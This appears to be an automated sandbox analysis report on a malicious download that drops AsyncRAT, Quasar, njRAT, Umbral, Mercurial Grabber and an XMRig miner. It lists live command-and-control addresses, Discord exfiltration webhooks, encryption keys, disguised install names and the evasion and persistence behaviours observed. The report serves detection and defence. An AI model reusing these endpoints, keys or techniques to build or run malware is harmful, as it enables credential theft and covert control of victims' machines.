asyncrat | hxxps://buzzheavier[.]com/zpxca2zcg07d

Resubmissions

28-11-2024 01:35

241128-bz4qvszjgt 7

28-11-2024 01:03

241128-bevmfsykgv 10

Analysis

max time kernel
1197s
max time network
1197s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 01:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://buzzheavier.com/zpxca2zcg07d

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

3.70.228.168:555

Mutex

bslxturcmlpmyqrv

Attributes

delay
1
install
true
install_file
atat.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes

delay
3
install
true
install_file
System32.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

one-accordance.gl.at.ply.gg:9590

forums-appliances.gl.at.ply.gg:1962

Attributes

delay
1
install
true
install_file
Windows Defender.exe
install_folder
%AppData%

aes.plain

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn

Extracted

Family

mercurialgrabber

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

quasar

Version

1.4.1

Botnet

ZJEB

VIPEEK1990-25013.portmap.host:25013

Mutex

ad21b115-2c1b-40cb-adba-a50736b76c21

Attributes

encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Service
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

14.243.221.170:2654

Mutex

a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd

Attributes

encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
install_name
Runtime Broker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1832-1130-0x000001E0E1AB0000-0x000001E0E1AF0000-memory.dmp	family_umbral
behavioral1/files/0x0007000000023d46-1129.dat	family_umbral

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Mercurialgrabber family
mercurialgrabber
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1376-1218-0x0000000000690000-0x00000000009B4000-memory.dmp	family_quasar
behavioral1/memory/4620-1224-0x00000000005A0000-0x00000000008C4000-memory.dmp	family_quasar
behavioral1/memory/4532-1228-0x0000000000470000-0x0000000000794000-memory.dmp	family_quasar

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x0003000000000707-1040.dat	family_asyncrat
behavioral1/files/0x000300000000072f-1074.dat	family_asyncrat
behavioral1/files/0x000300000000070f-1081.dat	family_asyncrat
behavioral1/files/0x0007000000023d44-1113.dat	family_asyncrat
behavioral1/files/0x0007000000023d47-1121.dat	family_asyncrat

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

output.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	output.exe

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4952-1410-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5196-1420-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5292-1429-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5292-1430-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5292-1436-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5292-1442-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig
behavioral1/memory/5292-1447-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2456	powershell.exe
3904	powershell.exe
4048	powershell.exe
2592	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

Processes:

saloader.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	saloader.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

output.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	output.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
3332	netsh.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

output.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	output.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Loader.exeseksiak.exeseksiak.exeseksiak.exexs.exeaidans.dont.run.exeseksiak.exeseksiak.exeaa.exeseksiak.exeseksiak.exeseksiak.exestart.exedsd.exeseksiak.exeseksiak.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	xs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	aidans.dont.run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	aa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	dsd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	seksiak.exe

Executes dropped EXE 42 IoCs

Processes:

aa.exeatat.exePhoto.scrhelp.scrhelp.scrstart.exeaa.exeataturk.exenobody.exenobody.exehandeltest.exeTutorial.exeSystem32.exexs.exeLoader.exeaidans.dont.run.exesaloader.exeoutput.exeaspnet_regbrowsers.exeWindows Defender.exewindows.exedsd.exeseksiak.exeRegistry.exeRuntime Broker.exeSGVP%20Client%20Users.exesvchost.exeseksiak.exePhoto.scrseksiak.exeseksiak.exe2HIf.exeseksiak.exeSMB.exe2HIf.exeseksiak.exe2HIf.exeseksiak.exeseksiak.exeseksiak.exeseksiak.exeseksiak.exe

pid	Process
2080	aa.exe
1956	atat.exe
4800	Photo.scr
3316	help.scr
2168	help.scr
3516	start.exe
4304	aa.exe
4284	ataturk.exe
4720	nobody.exe
2944	nobody.exe
3056	handeltest.exe
2820	Tutorial.exe
4736	System32.exe
2812	xs.exe
2636	Loader.exe
4620	aidans.dont.run.exe
1832	saloader.exe
436	output.exe
452	aspnet_regbrowsers.exe
4388	Windows Defender.exe
3228	windows.exe
4344	dsd.exe
1376	seksiak.exe
4620	Registry.exe
4544	Runtime Broker.exe
4532	SGVP%20Client%20Users.exe
4592	svchost.exe
2456	seksiak.exe
4044	Photo.scr
3468	seksiak.exe
4596	seksiak.exe
4952	2HIf.exe
2100	seksiak.exe
1944	SMB.exe
5196	2HIf.exe
5280	seksiak.exe
5292	2HIf.exe
3044	seksiak.exe
6916	seksiak.exe
6924	seksiak.exe
1396	seksiak.exe
7692	seksiak.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

help.scr

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\Downloads\\UrlHausFiles\\help.scr"	help.scr
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\Downloads\\UrlHausFiles\\help.scr"	help.scr

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

help.scr

description	ioc	Process
File opened (read-only)	\??\K:	help.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
70	raw.githubusercontent.com
72	raw.githubusercontent.com
315	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
322	ip4.seeip.org
325	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

output.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	output.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	output.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Tutorial.exe

description	pid	Process	procid_target
PID 2820 set thread context of 5004	2820	Tutorial.exe	174

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4952-1284-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/4952-1410-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5196-1420-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5292-1429-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5292-1430-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5292-1436-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5292-1442-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx
behavioral1/memory/5292-1447-0x00007FF7579D0000-0x00007FF758014000-memory.dmp	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

Processes:

help.scrhelp.scr

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	help.scr
File opened (read-only)	\??\VBoxMiniRdrDN	help.scr

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral1/files/0x0003000000000709-854.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

dsd.execmd.exetaskkill.exeschtasks.exeaspnet_regbrowsers.exePhoto.scrschtasks.execmd.exehandeltest.exehelp.scrTutorial.exeSystem32.execmd.exePhoto.scrcmd.exesvchost.execmd.exenetsh.exetaskkill.exeipconfig.exehelp.scrtimeout.execmd.exeSMB.execmd.exeipconfig.execmd.execmd.execmd.exeipconfig.execmd.exestart.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dsd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Photo.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handeltest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	help.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tutorial.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Photo.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	help.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SMB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
4152	cmd.exe
2156	PING.EXE
5464	PING.EXE
5364	PING.EXE
5080	PING.EXE
7400	PING.EXE
4072	PING.EXE
488	PING.EXE
2908	PING.EXE
3508	PING.EXE
4364	PING.EXE
5268	PING.EXE

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exeoutput.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	output.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

help.scrfirefox.exefirefox.exeoutput.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	help.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	help.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	output.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 5 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
4188	timeout.exe
1052	timeout.exe
2220	timeout.exe
4952	timeout.exe
1448	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exe

pid	Process
4952	wmic.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeoutput.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	output.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exe

pid	Process
7488	ipconfig.exe
652	ipconfig.exe
5428	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4824	taskkill.exe
5184	taskkill.exe
5400	taskkill.exe
7576	taskkill.exe
2464	taskkill.exe

Modifies registry class 36 IoCs

Processes:

powershell_ise.exemsedge.exeOpenWith.exefirefox.exe7zFM.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	powershell_ise.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	powershell_ise.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	powershell_ise.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "3"	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	powershell_ise.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	powershell_ise.exe
